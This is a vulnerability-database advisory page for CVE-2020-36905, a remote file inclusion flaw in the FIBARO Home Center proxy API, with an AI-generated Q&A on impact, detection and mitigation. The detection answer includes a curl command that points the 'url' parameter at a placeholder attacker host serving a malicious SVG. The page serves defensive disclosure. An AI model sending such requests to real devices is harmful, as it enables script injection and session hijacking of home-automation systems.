CVE-2020-36905
Unknown Unknown - Not Provided
Remote File Inclusion in FIBARO Home Center 5 Enables Session Hijack

Publication date: 2026-01-06

Last updated on: 2026-01-06

Assigner: VulnCheck

Description
FIBARO System Home Center 5.021 contains a remote file inclusion vulnerability in the undocumented proxy API that allows attackers to include arbitrary client-side scripts. Attackers can exploit the 'url' GET parameter to inject malicious JavaScript and potentially hijack user sessions or manipulate page content.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-06
Last Modified
2026-01-06
Generated
2026-05-07
AI Q&A
2026-01-06
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 7 associated CPEs
Vendor Product Version / Range
fibar_group_s.a. fibar_system_home_center to 5.021.38 (inc)
fibar_group_s.a. fibar_system_home_center 4.580
fibar_group_s.a. fibar_system_home_center 4.570
fibar_group_s.a. fibar_system_home_center 4.540
fibar_group_s.a. fibar_system_home_center 4.530
fibar_group_s.a. fibar_system_home_center 4.510
fibar_group_s.a. fibar_system_home_center 4.180
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-829 The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2020-36905 is a remote file inclusion vulnerability in the FIBARO System Home Center's undocumented proxy API. Attackers can exploit the 'url' GET parameter to inject arbitrary client-side scripts such as JavaScript or VBScript. This injection allows attackers to hijack user sessions or manipulate the webpage content by including malicious scripts. The vulnerability affects multiple versions of the FIBARO Home Center, including Home Center 3, 2, and Lite, and was demonstrated by injecting malicious SVG files that execute JavaScript on load. [1, 2, 3, 4]


How can this vulnerability impact me? :

This vulnerability can allow attackers to hijack your user sessions, potentially gaining unauthorized access to your smart home system. They can also manipulate the appearance and content of the web interface by injecting malicious scripts, which could lead to further attacks or disruption of your smart home automation and security functions. Since the FIBARO System Home Center manages device communication and automation, exploitation could compromise the security and operation of your smart home environment. [1, 2, 4]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for requests to the undocumented proxy API endpoint that includes the 'url' GET parameter with suspicious or crafted URLs. For example, look for HTTP requests to paths like /api/proxy?url= containing unexpected or malicious payloads such as SVG files with embedded JavaScript. A simple detection command using curl could be: curl -v 'http://<target-ip>/api/proxy?url=http://attacker.com/malicious.svg' to test if the endpoint is vulnerable. Additionally, network monitoring tools or web application firewalls can be configured to alert on such suspicious GET requests containing the 'url' parameter with external URLs. Checking web server logs for unusual requests to /api/proxy with URL parameters referencing external or untrusted domains can also help detect exploitation attempts. [1, 3, 4]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting or disabling access to the undocumented proxy API endpoint that accepts the 'url' GET parameter to prevent exploitation. Applying any available patches or updates from the vendor that address this vulnerability is recommended. If patches are not available, implement network-level controls such as firewall rules to block external access to the vulnerable API endpoint. Additionally, configure web application firewalls to detect and block requests attempting to exploit the 'url' parameter with malicious payloads. Monitoring and alerting on suspicious activity targeting this endpoint can help in early detection and response. Finally, educating users to avoid interacting with suspicious links that might trigger the vulnerability can reduce risk. [2, 4]


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart